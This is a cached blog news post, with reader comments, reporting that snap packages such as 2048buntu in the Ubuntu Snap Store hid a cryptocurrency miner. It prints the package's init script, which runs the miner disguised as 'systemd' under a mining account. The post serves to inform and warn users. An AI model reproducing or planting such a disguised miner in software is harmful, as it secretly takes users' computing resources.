(cache)Malware Found In The Ubuntu Snap Store

Oh, snap! Just because some packages are available to install directly from the Ubuntu Software Center doesn't make them safe. This is proved by a recent discovery of malware in some snap packages from the Ubuntu Snaps Store.

At least two of the snap packages, 2048buntu and Hextris, uploaded to the Ubuntu Snaps Store by user Nicolas Tomb, contained malware. All packages by Nicolas have since been removed from the Ubuntu Snaps Store, "pending further investigations".

The report comes from a bug which mentions that the 2048buntu snap package (and other packages by Nicolas Tomb) contains a hidden cryptocurrency miner inside. You can see the init script below:

#!/bin/bash

currency=bcn
name=2048buntu


{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores &lt; 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}

Yes, myfirstferrari@protonmail.com was used in the miner script. I guess that's one way of getting a Ferrari... 🙂.

An interesting aspect is that Nicolas Tomb used a proprietary license for at least some of his snaps. For example, the 2048buntu snap was submitted as proprietary (the game itself was not developed by Nicolas). The game in question, 2048, uses a MIT license which permits distributing it as proprietary, without making the source code available, as long as the copyright notices are retained.

Side note: 2048buntu was removed from the Ubuntu Snap store but you can check out its page via Google Cache. But we can't see the package contents any more (unless it's on GitHub somewhere but I couldn't find it).

How was this possible? Well, the Ubuntu Snap Store allows anyone to upload snap packages, as opposed to packages (deb) available in the official Ubuntu repositories. The reason for this is to provide more easily installable packages to its users.

What's your opinion regarding this? Do you think more and more malware will be getting through to users by allowing anyone to upload packages to the Ubuntu Store, or was this an isolated incident?

News via Reddit (u/Kron4ek).

13 comments:

dr tofuMay 13, 2018 at 12:10 AM
Conical doesn't care, they just like to brag about how many apps they have.
Tim DuncanMay 13, 2018 at 5:04 AM
I'm not totally against letting anyone upload to the Ubuntu Store but it should ALL have source code available.
elisideMay 13, 2018 at 5:25 AM
I have the same 2048 game on one of my android phones as a game build with kivy python. Now i see why the battery was draining so fast
slobeckMay 13, 2018 at 7:12 AM
this is why the AUR on Arch is a separate entity from the regular repos and even custom repos. The AUR has stuff from anyone but it's clear to everyone what the risks associated with it are and so people use it (hopefully) with caution.
Lubos ZanMay 13, 2018 at 11:46 AM
Does this mean that malware can be found in Ubuntu repositories too?
Justin SuessMay 13, 2018 at 1:48 PM
There should be no non-free software in the ubuntu store. Period.
TimMay 14, 2018 at 3:13 AM
sudo apt purge snapd

is in my config for ubuntu
UnknownMay 14, 2018 at 7:37 AM
seriously, no one finds stange that a 2048 game could be 138.8 MB ? that's a Huge red flag no ?

Malware Found In The Ubuntu Snap Store

13 comments:

Recent Posts

How To Add A Global Menu And HUD To Gnome Shell (Gnome Global AppMenu Extension)

Ubuntu Make Developer Tools Installer 18.05 Adds Support For Atom Beta, Eclipse Javascript, Re-Enables Unity3D

Nautilus Will No Longer Launch Binaries Or Desktop Files

Get A Floating Live Window Preview In Gnome With Window Corner Preview Extension

Malware Found In The Ubuntu Snap Store

Social

Popular Posts

Contact Form

Editor's Picks

Linux Uprising

Follow by Email

Blog Archive